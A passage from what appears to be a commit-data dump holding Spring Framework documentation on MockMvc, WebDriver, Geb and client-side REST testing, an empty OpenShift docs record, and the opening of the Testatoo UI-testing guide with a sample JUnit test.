MockMvcWebClientBuilder\n\t\t.mockMvcSetup(mockMvc)\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n----\n\nThis is more verbose, but by building the `WebClient` with a `MockMvc` instance we have\nthe full power of `MockMvc` at our fingertips.\n\n[TIP]\n====\nFor additional information on creating a `MockMvc` instance refer to\n<<spring-mvc-test-server-setup-options>>.\n====\n\n[[spring-mvc-test-server-htmlunit-webdriver]]\n===== MockMvc and WebDriver\n\nIn the previous sections, we have seen how to use `MockMvc` in conjunction with the raw\nHtmlUnit APIs. In this section, we will leverage additional abstractions within the Selenium\nhttp:\/\/docs.seleniumhq.org\/projects\/webdriver\/[WebDriver] to make things even easier.\n\n[[spring-mvc-test-server-htmlunit-webdriver-why]]\n====== Why WebDriver and MockMvc?\n\nWe can already use HtmlUnit and `MockMvc`, so why would we want to use `WebDriver`? The\nSelenium `WebDriver` provides a very elegant API that allows us to easily organize our code.\nTo better understand, let's explore an example.\n\n[NOTE]\n====\nDespite being a part of http:\/\/docs.seleniumhq.org\/[Selenium], WebDriver does not require\na Selenium Server to run your tests.\n====\n\nSuppose we need to ensure that a message is created properly. The tests involve finding\nthe HTML form input elements, filling them out, and making various assertions.\n\nThis approach results in numerous, separate tests because we want to test error\nconditions as well. For example, we want to ensure that we get an error if we fill out\nonly part of the form. If we fill out the entire form, the newly created message should\nbe displayed afterwards.\n\nIf one of the fields were named \"summary\", then we might have something like the\nfollowing repeated in multiple places within our tests.\n\n[source,java]\n----\nHtmlTextInput summaryInput = currentPage.getHtmlElementById(\"summary\");\nsummaryInput.setValueAttribute(summary);\n----\n\nSo what happens if we change the `id` to \"smmry\"? Doing so would force us to update all\nof our tests to incorporate this change! Of course, this violates the _DRY Principle_; so\nwe should ideally extract this code into its own method as follows.\n\n[source,java]\n----\npublic HtmlPage createMessage(HtmlPage currentPage, String summary, String text) {\n\tsetSummary(currentPage, summary);\n\t\/\/ ...\n}\n\npublic void setSummary(HtmlPage currentPage, String summary) {\n\tHtmlTextInput summaryInput = currentPage.getHtmlElementById(\"summary\");\n\tsummaryInput.setValueAttribute(summary);\n}\n----\n\nThis ensures that we do not have to update all of our tests if we change the UI.\n\nWe might even take this a step further and place this logic within an Object that\nrepresents the `HtmlPage` we are currently on.\n\n[source,java]\n----\npublic class CreateMessagePage {\n\n\tfinal HtmlPage currentPage;\n\n\tfinal HtmlTextInput summaryInput;\n\n\tfinal HtmlSubmitInput submit;\n\n\tpublic CreateMessagePage(HtmlPage currentPage) {\n\t\tthis.currentPage = currentPage;\n\t\tthis.summaryInput = currentPage.getHtmlElementById(\"summary\");\n\t\tthis.submit = currentPage.getHtmlElementById(\"submit\");\n\t}\n\n\tpublic <T> T createMessage(String summary, String text) throws Exception {\n\t\tsetSummary(summary);\n\n\t\tHtmlPage result = submit.click();\n\t\tboolean error = CreateMessagePage.at(result);\n\n\t\treturn (T) (error ? new CreateMessagePage(result) : new ViewMessagePage(result));\n\t}\n\n\tpublic void setSummary(String summary) throws Exception {\n\t\tsummaryInput.setValueAttribute(summary);\n\t}\n\n\tpublic static boolean at(HtmlPage page) {\n\t\treturn \"Create Message\".equals(page.getTitleText());\n\t}\n}\n----\n\nFormerly, this pattern is known as the\nhttps:\/\/github.com\/SeleniumHQ\/selenium\/wiki\/PageObjects[Page Object Pattern]. While we can\ncertainly do this with HtmlUnit, WebDriver provides some tools that we will explore in the\nfollowing sections to make this pattern much easier to implement.\n\n[[spring-mvc-test-server-htmlunit-webdriver-setup]]\n====== MockMvc and WebDriver Setup\n\nTo use Selenium WebDriver with the Spring MVC Test framework, make sure that your project\nincludes a test dependency on `org.seleniumhq.selenium:selenium-htmlunit-driver`.\n\nWe can easily create a Selenium `WebDriver` that integrates with `MockMvc` using the\n`MockMvcHtmlUnitDriverBuilder` as follows.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebDriver driver;\n\n@Before\npublic void setup() {\n\tdriver = MockMvcHtmlUnitDriverBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\n[NOTE]\n====\nThis is a simple example of using `MockMvcHtmlUnitDriverBuilder`.\nFor more advanced usage, refer to <<Advanced MockMvcHtmlUnitDriverBuilder>>\n====\n\nThis will ensure that any URL referencing `localhost` as the server will be directed to\nour `MockMvc` instance without the need for a real HTTP connection. Any other URL will be\nrequested using a network connection as normal. This allows us to easily test the use of\nCDNs.\n\n[[spring-mvc-test-server-htmlunit-webdriver-usage]]\n====== MockMvc and WebDriver Usage\n\nNow we can use WebDriver as we normally would, but without the need to deploy our\napplication to a Servlet container. For example, we can request the view to create\na message with the following.\n\n[source,java]\n----\nCreateMessagePage page = CreateMessagePage.to(driver);\n----\n\nWe can then fill out the form and submit it to create a message.\n\n[source,java]\n----\nViewMessagePage viewMessagePage =\n\tpage.createMessage(ViewMessagePage.class, expectedSummary, expectedText);\n----\n\nThis improves on the design of our\n<<spring-mvc-test-server-htmlunit-mah-usage,HtmlUnit test>> by leveraging the _Page Object\nPattern_. As we mentioned in <<spring-mvc-test-server-htmlunit-webdriver-why>>, we can\nuse the Page Object Pattern with HtmlUnit, but it is much easier with WebDriver. Let's\ntake a look at our new `CreateMessagePage` implementation.\n\n[source,java]\n----\npublic class CreateMessagePage\n\t\textends AbstractPage { \/\/ <1>\n\n\t\/\/ <2>\n\tprivate WebElement summary;\n\tprivate WebElement text;\n\n\t\/\/ <3>\n\t@FindBy(css = \"input[type=submit]\")\n\tprivate WebElement submit;\n\n\tpublic CreateMessagePage(WebDriver driver) {\n\t\tsuper(driver);\n\t}\n\n\tpublic <T> T createMessage(Class<T> resultPage, String summary, String details) {\n\t\tthis.summary.sendKeys(summary);\n\t\tthis.text.sendKeys(details);\n\t\tthis.submit.click();\n\t\treturn PageFactory.initElements(driver, resultPage);\n\t}\n\n\tpublic static CreateMessagePage to(WebDriver driver) {\n\t\tdriver.get(\"http:\/\/localhost:9990\/mail\/messages\/form\");\n\t\treturn PageFactory.initElements(driver, CreateMessagePage.class);\n\t}\n}\n----\n\n<1> The first thing you will notice is that `CreateMessagePage` extends the\n`AbstractPage`. We won't go over the details of `AbstractPage`, but in summary it\ncontains common functionality for all of our pages. For example, if our application has\na navigational bar, global error messages, etc., this logic can be placed in a shared\nlocation.\n\n<2> The next thing you will notice is that we have a member variable for each of the\nparts of the HTML page that we are interested in. These are of type `WebElement`.\n``WebDriver``'s https:\/\/github.com\/SeleniumHQ\/selenium\/wiki\/PageFactory[PageFactory] allows\nus to remove a lot of code from the HtmlUnit version of `CreateMessagePage` by\nautomatically resolving each `WebElement`. The\nhttps:\/\/seleniumhq.github.io\/selenium\/docs\/api\/java\/org\/openqa\/selenium\/support\/PageFactory.html#initElements-org.openqa.selenium.WebDriver-java.lang.Class-[PageFactory#initElements(WebDriver,Class<T>)]\nmethod will automatically resolve each `WebElement` by using the field name and looking it\nup by the `id` or `name` of the element within the HTML page.\n\n<3> We can use the\nhttps:\/\/github.com\/SeleniumHQ\/selenium\/wiki\/PageFactory#making-the-example-work-using-annotations[@FindBy annotation]\nto override the default lookup behavior. Our example demonstrates how to use the `@FindBy`\nannotation to look up our submit button using a css selector, *input[type=submit]*.\n\nFinally, we can verify that a new message was created successfully. The following\nassertions use the https:\/\/code.google.com\/p\/fest\/[FEST assertion library].\n\n[source,java]\n----\nassertThat(viewMessagePage.getMessage()).isEqualTo(expectedMessage);\nassertThat(viewMessagePage.getSuccess()).isEqualTo(\"Successfully created a new message\");\n----\n\nWe can see that our `ViewMessagePage` allows us to interact with our custom domain\nmodel. For example, it exposes a method that returns a `Message` object.\n\n[source,java]\n----\npublic Message getMessage() throws ParseException {\n\tMessage message = new Message();\n\tmessage.setId(getId());\n\tmessage.setCreated(getCreated());\n\tmessage.setSummary(getSummary());\n\tmessage.setText(getText());\n\treturn message;\n}\n----\n\nWe can then leverage the rich domain objects in our assertions.\n\nLastly, don't forget to _close_ the `WebDriver` instance when the test is complete.\n\n[source,java]\n----\n@After\npublic void destroy() {\n\tif (driver != null) {\n\t\tdriver.close();\n\t}\n}\n----\n\nFor additional information on using WebDriver, refer to the Selenium\nhttps:\/\/github.com\/SeleniumHQ\/selenium\/wiki\/Getting-Started[WebDriver documentation].\n\n[[spring-mvc-test-server-htmlunit-webdriver-advanced-builder]]\n====== Advanced MockMvcHtmlUnitDriverBuilder\n\nIn the examples so far, we have used `MockMvcHtmlUnitDriverBuilder` in the simplest way\npossible, by building a `WebDriver` based on the `WebApplicationContext` loaded for us by\nthe Spring TestContext Framework. This approach is repeated here.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebDriver driver;\n\n@Before\npublic void setup() {\n\tdriver = MockMvcHtmlUnitDriverBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\nWe can also specify additional configuration options.\n\n[source,java]\n----\nWebDriver driver;\n\n@Before\npublic void setup() {\n\tdriver = MockMvcHtmlUnitDriverBuilder\n\t\t\/\/ demonstrates applying a MockMvcConfigurer (Spring Security)\n\t\t.webAppContextSetup(context, springSecurity())\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n}\n----\n\nAs an alternative, we can perform the exact same setup by configuring the `MockMvc`\ninstance separately and supplying it to the `MockMvcHtmlUnitDriverBuilder` as follows.\n\n[source,java]\n----\nMockMvc mockMvc = MockMvcBuilders\n\t\t.webAppContextSetup(context)\n\t\t.apply(springSecurity())\n\t\t.build();\n\ndriver = MockMvcHtmlUnitDriverBuilder\n\t\t.mockMvcSetup(mockMvc)\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n----\n\nThis is more verbose, but by building the `WebDriver` with a `MockMvc` instance we have\nthe full power of `MockMvc` at our fingertips.\n\n[TIP]\n====\nFor additional information on creating a `MockMvc` instance refer to\n<<spring-mvc-test-server-setup-options>>.\n====\n\n[[spring-mvc-test-server-htmlunit-geb]]\n===== MockMvc and Geb\n\nIn the previous section, we saw how to use `MockMvc` with `WebDriver`. In this section,\nwe will use http:\/\/www.gebish.org\/[Geb] to make our tests even Groovy-er.\n\n\n[[spring-mvc-test-server-htmlunit-geb-why]]\n====== Why Geb and MockMvc?\n\nGeb is backed by WebDriver, so it offers many of the\n<<spring-mvc-test-server-htmlunit-webdriver-why,same benefits>> that we get from\nWebDriver. However, Geb makes things even easier by taking care of some of the\nboilerplate code for us.\n\n[[spring-mvc-test-server-htmlunit-geb-setup]]\n====== MockMvc and Geb Setup\n\nWe can easily initialize a Geb `Browser` with a Selenium `WebDriver` that uses `MockMvc`\nas follows.\n\n[source,groovy]\n----\ndef setup() {\n\tbrowser.driver = MockMvcHtmlUnitDriverBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build()\n}\n----\n\n[NOTE]\n====\nThis is a simple example of using `MockMvcHtmlUnitDriverBuilder`.\nFor more advanced usage, refer to <<Advanced MockMvcHtmlUnitDriverBuilder>>\n====\n\nThis will ensure that any URL referencing `localhost` as the server will be directed to\nour `MockMvc` instance without the need for a real HTTP connection. Any other URL will be\nrequested using a network connection as normal. This allows us to easily test the use of\nCDNs.\n\n[[spring-mvc-test-server-htmlunit-geb-usage]]\n====== MockMvc and Geb Usage\n\nNow we can use Geb as we normally would, but without the need to deploy our\napplication to a Servlet container. For example, we can request the view to create\na message with the following:\n\n[source,groovy]\n----\nto CreateMessagePage\n----\n\nWe can then fill out the form and submit it to create a message.\n\n[source,groovy]\n----\nwhen:\nform.summary = expectedSummary\nform.text = expectedMessage\nsubmit.click(ViewMessagePage)\n----\n\nAny unrecognized method calls or property accesses\/references that are not found will be\nforwarded to the current page object. This removes a lot of the boilerplate code we needed\nwhen using WebDriver directly.\n\nAs with direct WebDriver usage, this improves on the design of our\n<<spring-mvc-test-server-htmlunit-mah-usage,HtmlUnit test>> by leveraging the _Page Object\nPattern_. As mentioned previously, we can use the Page Object Pattern with HtmlUnit and\nWebDriver, but it is even easier with Geb. Let's take a look at our new Groovy-based\n`CreateMessagePage` implementation.\n\n[source,groovy]\n----\nclass CreateMessagePage extends Page {\n\tstatic url = 'messages\/form'\n\tstatic at = { assert title == 'Messages : Create'; true }\n\tstatic content = {\n\t\tsubmit { $('input[type=submit]') }\n\t\tform { $('form') }\n\t\terrors(required:false) { $('label.error, .alert-error')?.text() }\n\t}\n}\n----\n\nThe first thing you will notice is that our `CreateMessagePage` extends `Page`. We won't\ngo over the details of `Page`, but in summary it contains common functionality for all of\nour pages. The next thing you will notice is that we define a URL in which this page can\nbe found. This allows us to navigate to the page as follows.\n\n[source,groovy]\n----\nto CreateMessagePage\n----\n\nWe also have an `at` closure that determines if we are at the specified page. It should return\n`true` if we are on the correct page. This is why we can assert that we are on the correct\npage as follows.\n\n[source,groovy]\n----\nthen:\nat CreateMessagePage\nerrors.contains('This field is required.')\n----\n\n[NOTE]\n====\nWe use an assertion in the closure, so that we can determine where things went wrong if\nwe were at the wrong page.\n====\n\nNext we create a `content` closure that specifies all the areas of interest within the page.\nWe can use a\nhttp:\/\/www.gebish.org\/manual\/current\/#the-jquery-ish-navigator-api[jQuery-ish Navigator API]\nto select the content we are interested in.\n\nFinally, we can verify that a new message was created successfully.\n\n[source,groovy]\n----\nthen:\nat ViewMessagePage\nsuccess == 'Successfully created a new message'\nid\ndate\nsummary == expectedSummary\nmessage == expectedMessage\n----\n\nFor further details on how to get the most out of Geb, consult\nhttp:\/\/www.gebish.org\/manual\/current\/[The Book of Geb] user's manual.\n\n\n[[spring-mvc-test-client]]\n==== Client-Side REST Tests\nClient-side tests can be used to test code that internally uses the `RestTemplate`.\nThe idea is to declare expected requests and to provide \"stub\" responses so that\nyou can focus on testing the code in isolation, i.e. without running a server.\nHere is an example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tRestTemplate restTemplate = new RestTemplate();\n\n\tMockRestServiceServer mockServer = MockRestServiceServer.bindTo(restTemplate).build();\n\tmockServer.expect(requestTo(\"\/greeting\")).andRespond(withSuccess());\n\n\t\/\/ Test code that uses the above RestTemplate ...\n\n\tmockServer.verify();\n----\n\nIn the above example, `MockRestServiceServer`, the central class for client-side REST\ntests, configures the `RestTemplate` with a custom `ClientHttpRequestFactory` that\nasserts actual requests against expectations and returns \"stub\" responses. In this case\nwe expect a request to \"\/greeting\" and want to return a 200 response with\n\"text\/plain\" content. We could define as additional expected requests and stub responses as\nneeded. When expected requests and stub responses are defined, the `RestTemplate` can be\nused in client-side code as usual. At the end of testing `mockServer.verify()` can be\nused to verify that all expectations have been satisfied.\n\nBy default requests are expected in the order in which expectations were declared.\nYou can set the `ignoreExpectOrder` option when building the server in which case\nall expectations are checked (in order) to find a match for a given request. That\nmeans requests are allowed to come in any order. Here is an example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tserver = MockRestServiceServer.bindTo(restTemplate).ignoreExpectOrder(true).build();\n----\n\nEven with unordered requests by default each request is allowed to execute once only.\nThe `expect` method provides an overloaded variant that accepts an `ExpectedCount`\nargument that specifies a count range, e.g. `once`, `manyTimes`, `max`, `min`,\n`between`, and so on. Here is an example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tRestTemplate restTemplate = new RestTemplate();\n\n\tMockRestServiceServer mockServer = MockRestServiceServer.bindTo(restTemplate).build();\n\tmockServer.expect(times(2), requestTo(\"\/foo\")).andRespond(withSuccess());\n\tmockServer.expect(times(3), requestTo(\"\/bar\")).andRespond(withSuccess());\n\n\t\/\/ ...\n\n\tmockServer.verify();\n----\n\nNote that when `ignoreExpectOrder` is not set (the default), and therefore requests\nare expected in order of declaration, then that order only applies to the first of\nany expected request. For example if \"\/foo\" is expected 2 times followed by \"\/bar\"\n3 times, then there should be a request to \"\/foo\" before there is a request to \"\/bar\"\nbut aside from that subsequent \"\/foo\" and \"\/bar\" requests can come at any time.\n\nAs an alternative to all of the above the client-side test support also provides a\n`ClientHttpRequestFactory` implementation that can be configured into a `RestTemplate`\nto bind it to a `MockMvc` instance. That allows processing requests using actual\nserver-side logic but without running a server. Here is an example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tMockMvc mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();\n\tthis.restTemplate = new RestTemplate(new MockMvcClientHttpRequestFactory(mockMvc));\n\n\t\/\/ Test code that uses the above RestTemplate ...\n\n\tmockServer.verify();\n----\n\n\n\n[[spring-mvc-test-client-static-imports]]\n===== Static Imports\nJust like with server-side tests, the fluent API for client-side tests requires a few\nstatic imports. Those are easy to find by searching __\"MockRest*\"__. Eclipse users\nshould add `\"MockRestRequestMatchers.{asterisk}\"` and `\"MockRestResponseCreators.{asterisk}\"`\nas \"favorite static members\" in the Eclipse preferences under\n__Java -> Editor -> Content Assist -> Favorites__.\nThat allows using content assist after typing the first character of the\nstatic method name. Other IDEs (e.g. IntelliJ) may not require any additional\nconfiguration. Just check the support for code completion on static members.\n\n[[spring-mvc-test-client-resources]]\n===== Further Examples of Client-side REST Tests\nSpring MVC Test's own tests include\nhttps:\/\/github.com\/spring-projects\/spring-framework\/tree\/master\/spring-test\/src\/test\/java\/org\/springframework\/test\/web\/client\/samples[example\ntests] of client-side REST tests.\n\n\n\n[[testing-examples-petclinic]]\n=== PetClinic Example\n\nThe PetClinic application, available on\nhttps:\/\/github.com\/spring-projects\/spring-petclinic[GitHub], illustrates several features\nof the __Spring TestContext Framework__ in a JUnit 4 environment. Most test functionality\nis included in the `AbstractClinicTests`, for which a partial listing is shown below:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport static org.junit.Assert.assertEquals;\n\t\/\/ import ...\n\n\t**@ContextConfiguration**\n\tpublic abstract class AbstractClinicTests **extends AbstractTransactionalJUnit4SpringContextTests** {\n\n\t\t**@Autowired**\n\t\tprotected Clinic clinic;\n\n\t\t@Test\n\t\tpublic void getVets() {\n\t\t\tCollection<Vet> vets = this.clinic.getVets();\n\t\t\tassertEquals(\"JDBC query must show the same number of vets\",\n\t\t\t\t**super.countRowsInTable(\"VETS\")**, vets.size());\n\t\t\tVet v1 = EntityUtils.getById(vets, Vet.class, 2);\n\t\t\tassertEquals(\"Leary\", v1.getLastName());\n\t\t\tassertEquals(1, v1.getNrOfSpecialties());\n\t\t\tassertEquals(\"radiology\", (v1.getSpecialties().get(0)).getName());\n\t\t\t\/\/ ...\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n\nNotes:\n\n* This test case extends the `AbstractTransactionalJUnit4SpringContextTests` class, from\n which it inherits configuration for Dependency Injection (through the\n `DependencyInjectionTestExecutionListener`) and transactional behavior (through the\n `TransactionalTestExecutionListener`).\n* The `clinic` instance variable -- the application object being tested -- is set by\n Dependency Injection through `@Autowired` semantics.\n* The `getVets()` method illustrates how you can use the inherited `countRowsInTable()`\n method to easily verify the number of rows in a given table, thus verifying correct\n behavior of the application code being tested. This allows for stronger tests and\n lessens dependency on the exact test data. For example, you can add additional rows in\n the database without breaking tests.\n* Like many integration tests that use a database, most of the tests in\n `AbstractClinicTests` depend on a minimum amount of data already in the database before\n the test cases run. Alternatively, you might choose to populate the database within the\n test fixture set up of your test cases -- again, within the same transaction as the\n tests.\n\nThe PetClinic application supports three data access technologies: JDBC, Hibernate, and\nJPA. By declaring `@ContextConfiguration` without any specific resource locations, the\n`AbstractClinicTests` class will have its application context loaded from the default\nlocation, `AbstractClinicTests-context.xml`, which declares a common `DataSource`.\nSubclasses specify additional context locations that must declare a\n`PlatformTransactionManager` and a concrete implementation of `Clinic`.\n\nFor example, the Hibernate implementation of the PetClinic tests contains the following\nimplementation. For this example, `HibernateClinicTests` does not contain a single line\nof code: we only need to declare `@ContextConfiguration`, and the tests are inherited\nfrom `AbstractClinicTests`. Because `@ContextConfiguration` is declared without any\nspecific resource locations, the __Spring TestContext Framework__ loads an application\ncontext from all the beans defined in `AbstractClinicTests-context.xml` (i.e., the\ninherited locations) and `HibernateClinicTests-context.xml`, with\n`HibernateClinicTests-context.xml` possibly overriding beans defined in\n`AbstractClinicTests-context.xml`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**\n\tpublic class HibernateClinicTests extends AbstractClinicTests { }\n----\n\nIn a large-scale application, the Spring configuration is often split across multiple\nfiles. Consequently, configuration locations are typically specified in a common base\nclass for all application-specific integration tests. Such a base class may also add\nuseful instance variables -- populated by Dependency Injection, naturally -- such as a\n`SessionFactory` in the case of an application using Hibernate.\n\nAs far as possible, you should have exactly the same Spring configuration files in your\nintegration tests as in the deployed environment. One likely point of difference\nconcerns database connection pooling and transaction infrastructure. If you are\ndeploying to a full-blown application server, you will probably use its connection pool\n(available through JNDI) and JTA implementation. Thus in production you will use a\n`JndiObjectFactoryBean` or `<jee:jndi-lookup>` for the `DataSource` and\n`JtaTransactionManager`. JNDI and JTA will not be available in out-of-container\nintegration tests, so you should use a combination like the Commons DBCP\n`BasicDataSource` and `DataSourceTransactionManager` or `HibernateTransactionManager`\nfor them. You can factor out this variant behavior into a single XML file, having the\nchoice between application server and a 'local' configuration separated from all other\nconfiguration, which will not vary between the test and production environments. In\naddition, it is advisable to use properties files for connection settings. See the\nPetClinic application for an example.\n\n\n\n\n[[testing-resources]]\n== Further Resources\nConsult the following resources for more information about testing:\n\n* http:\/\/www.junit.org\/[JUnit]: \"__A programmer-oriented testing framework for Java__\".\n Used by the Spring Framework in its test suite.\n* http:\/\/testng.org\/[TestNG]: A testing framework inspired by JUnit with added support\n for annotations, test groups, data-driven testing, distributed testing, etc.\n* http:\/\/joel-costigliola.github.io\/assertj\/[AssertJ]: \"__Fluent assertions for Java__\"\n including support for Java 8 lambdas, streams, etc.\n* http:\/\/en.wikipedia.org\/wiki\/Mock_Object[Mock Objects]: Article in Wikipedia.\n* http:\/\/www.mockobjects.com\/[MockObjects.com]: Web site dedicated to mock objects, a\n technique for improving the design of code within test-driven development.\n* http:\/\/mockito.org\/[Mockito]: Java mock library based on the\n http:\/\/xunitpatterns.com\/Test%20Spy.html[test spy] pattern.\n* http:\/\/www.easymock.org\/[EasyMock]: Java library \"__that provides Mock Objects for\n interfaces (and objects through the class extension) by generating them on the fly\n using Java's proxy mechanism.__\" Used by the Spring Framework in its test suite.\n* http:\/\/www.jmock.org\/[JMock]: Library that supports test-driven development of Java\n code with mock objects.\n* http:\/\/dbunit.sourceforge.net\/[DbUnit]: JUnit extension (also usable with Ant and\n Maven) targeted for database-driven projects that, among other things, puts your\n database into a known state between test runs.\n* http:\/\/grinder.sourceforge.net\/[The Grinder]: Java load testing framework.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"83ccc70b6d2fd53eab70f39cf5d88b80e04848bc","subject":"Prevent LD_PRELOAD error","message":"Prevent LD_PRELOAD error\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"creating_images\/guidelines.adoc","new_file":"creating_images\/guidelines.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4df8d32c8264a200df164bc4e355aeeec9e1eb53","subject":"Improve documentation","message":"Improve documentation\n","repos":"Ovea\/testatoo,Ovea\/testatoo","old_file":"testatoo-documentation\/doc\/testatoo.adoc","new_file":"testatoo-documentation\/doc\/testatoo.adoc","new_contents":"= Testatoo documentation\nv2.0, 2014\n:toc:\n:doctype: book\n:icons: font\n:homepage: https:\/\/github.com\/Ovea\/testatoo\n:desc: This is the documentation of Testatoo\n:testaoo-version: 2.0.b1\n\n:source-highlighter: highlightjs\n:imagesdir: images\n\nimage:logo.png[float=\"left\"]\n\n== Introduction\n\nTestatoo is a web user interface testing tool. It's the result of numerous real-world observations of developers in the trenches in the area of GUI testing.\nWorking for many years to promote the TDD approaches, we often faced difficulties in their implementation for the graphical layer of applications.\n\nThe \"test FIRST\" principle excludes all scenario recorder based approaches that only allow you to write a posteriori tests.\nOur experience has taught us that this path is a dead end (but we reserve this for another discussion...).\n\nAnother problem is UI tests are brittle and costly! We do think that this is due to the lack of abstraction in existing UI testing tools.\n\nTestatoo provides on one hand an abstraction of the UI business domain through an expressive API and on the other hand a way to express this domain via a DSL (a button semantically stays a buttons whatever the technology).\nWith Testatoo you can therefore write tests with a seldom achieved level of expressiveness and make these tests INDEPENDENT of the underlying technology.\n\nTestatoo can therefore transform the test in real assets, present throughout the life of the application and always in tune with the latest version of the application.\n\n== Technologies\n\nTestatoo is built on top of http:\/\/code.google.com\/p\/selenium\/[WebDriver], it can work with any browser supported by https:\/\/code.google.com\/p\/selenium\/wiki\/FrequentlyAskedQuestions[WebDriver] (IE, Google-chrome, Firefox, ...).\nIf Testatoo provides, like http:\/\/www.gebish.org\/testing[geb], an extra layer of convenience and productivity. It's always possible to \"fallback\" to the WebDriver level to do something directly should you need to.\nBut Testatoo adds a powerful DSL while maintaining the usage of Groovy and keeps the advantage of a strong typed language.\n\nExample of a test syntax :\n\n[source, groovy]\n-------------------------------------------------------------------------------\n assertThat textField has label('myLabel')\n assertThat textField has placeholder('My placeholder')\n assertThat textField is empty\n-------------------------------------------------------------------------------\n\n== Why should I use Testatoo\n\nIf you don't use Testatoo for your UI tests it's like you \"Knocking On Heaven's Door\".\n\n== Installation & Usage (I want to ride my bicycle)\n\nOne snipet of code is worth a thousand words.\nSo lt's go...\n\nGet Testatoo and dependencies libraries via Maven...\n\n[source, xml]\n-------------------------------------------------------------------------------\n<dependency>\n <groupId>org.testatoo<\/groupId>\n <artifactId>testatoo-core<\/artifactId>\n <version>{testaoo-version}<\/version>\n <scope>test<\/scope>\n<\/dependency>\n<dependency>\n <groupId>junit<\/groupId>\n <artifactId>junit<\/artifactId>\n <version>4.11<\/version>\n <scope>test<\/scope>\n<\/dependency>\n<dependency>\n <groupId>org.seleniumhq.selenium<\/groupId>\n <artifactId>selenium-java<\/artifactId>\n <version>2.39.0<\/version>\n <scope>test<\/scope>\n<\/dependency>\n-------------------------------------------------------------------------------\n\nTestatoo work with existing popular unit test libraries like JUnit.\nIn our first test (BaseGoogleTest) we test a simple search on Google.\n\nThe test looks like :\n\n[source, groovy]\n-------------------------------------------------------------------------------\npackage starter\n\nimport org.junit.AfterClass\nimport org.junit.BeforeClass\nimport org.junit.Test\nimport org.junit.runner.RunWith\nimport org.junit.runners.JUnit4\nimport org.openqa.selenium.firefox.FirefoxDriver\nimport org.testatoo.core.Testatoo\nimport org.testatoo.core.component.Button\nimport org.testatoo.core.component.input.TextField\nimport org.testatoo.core.component.list.ListView\nimport org.testatoo.core.evaluator.webdriver.WebDriverEvaluator\n\nimport static org.testatoo.core.Testatoo.*\nimport static org.testatoo.core.input.Mouse.*\nimport static org.testatoo.core.property.Properties.*\nimport static org.testatoo.core.state.States.*\n\n@RunWith(JUnit4)\nclass BaseGoogleTest {\n\n @BeforeClass\n public static void setup() {\n Testatoo.evaluator = new WebDriverEvaluator(new FirefoxDriver())\n open 'http:\/\/www.google.com'\n }\n @AfterClass public static void tearDown() { evaluator.close() }\n\n @Test\n public void simple_test() {\n TextField searchField = $('#gbqfq') as TextField\n Button searchButton = $('#gbqfb') as Button\n ListView resultList = $('#rso') as ListView\n\n assertThat resultList is missing\n assertThat searchField is visible\n\n on searchField enter 'Testatoo'\n clickOn searchButton\n\n waitUntil {resultList.is visible}\n\n assertThat resultList.items[0] has value.containing('Testatoo')\n }\n\n}\n-------------------------------------------------------------------------------\n\nIf you run the test it should process a simple search on google engine.\nSome interesting element can be show in this test :\n\nTestatoo work with Strongly typed components:: Testatoo manipulate typed components like TextField, Button, ListView.\n The power of Testatoo is in one hand to provide a rich list of components and on the other one the possibility\n to easily create and compose your own components set.\n\nTestatoo use deferred evaluation:: As you can see we instantiate a ListView event if the component is not available in the page.\n You can test if the component is missing\n\nTestatoo DSL is very clean and functional:: Testatoo is based on a clear and powerful syntax.\nTestatoo code never refer to a technical layer:: Under no circumstances in this test the underline DOM technology transpire in our code.\n\n[NOTE]\n===============================\nAs a rule when you create a test with Testatoo we recommend to add some default import to facilitate the automatic completion on your favorite IDE(A).\n\n[source, groovy]\n-------------------------------------------------------------------------------\n\nimport static org.testatoo.core.Testatoo.*\nimport static org.testatoo.core.input.Mouse.*\nimport static org.testatoo.core.property.Properties.*\nimport static org.testatoo.core.state.States.*\n\n-------------------------------------------------------------------------------\n===============================\n\n== Back to the future\n\nWell well well (My Michelle), as explained Testatoo is library to write functional test. Functional test mean SPECIFICATION.\n\nAs a SPECIFIER I want to express my test (intention) BEFORE to code my UI. So if the intention is to have\na page with two radio buttons to select the gender (male or female). The test can be expressed like this :\n\n-------------------------------------------------------------------------------\nassert that the maleRadio is unchecked\nand it has label \"Male\"\n\nassert that the femaleRadio is unchecked\nand it has label \"Female\"\n\ncheck the maleRadio\nassert that the maleRadio is checked\nassert that the femaleRadio is unchecked\n\ncheck the femaleRadio\nassert that the femaleRadio checked\nassert that the maleRadio is unchecked\n-------------------------------------------------------------------------------\n\nThe Testatoo syntax to express this specification is :\n\n[source, groovy]\n-------------------------------------------------------------------------------\nassertThat {\n 